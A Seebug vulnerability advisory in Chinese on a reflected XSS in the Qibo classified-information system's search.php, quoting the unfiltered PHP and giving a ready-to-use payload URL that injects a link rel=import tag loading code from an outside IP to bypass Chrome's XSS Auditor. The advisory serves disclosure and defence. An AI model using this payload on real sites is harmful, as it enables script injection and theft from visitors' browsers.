齐博分类信息系统最新版反射性XSS(bypass Chrome XSS Auditor)

2014-12-16T00:00:00
ID SSV:94183
Type seebug
Reporter Root
Modified 2014-12-16T00:00:00

Description

简要描述:

全局变量可控+为过滤造成的XSS

详细说明:

/search.php

$module_select="<select name='mid' onChange=\"window.location.href='?mid='+this.options[this.selectedIndex].value\"><option value='0' style='color:#aaa;'>所有模型 </option>"; foreach($module_db AS $key=>$value){ $ckk=$mid==$key?' selected ':' '; $module_select.="<option value='$key' $ckk>$value</option>"; } $module_select.="</select>"; if($mid){ $SQL=" AND mid='$mid' ";

由于qibo的全局机制,module_db可控,直接带入HTML导致XSS。利用<link rel=import href=xxx>可以bypass chrome的过滤。 Payload: http://10.211.55.3/fenlei/search.php?module_db[]=%3C/option%3E%3C/select%3E%3Clink%20rel=import%20href=http://103.224.80.59/2.php%3E%3C!--

漏洞证明:

<img src="https://images.seebug.org/upload/201412/101604193eeda512bb08bb5821694ec20c4d68f6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">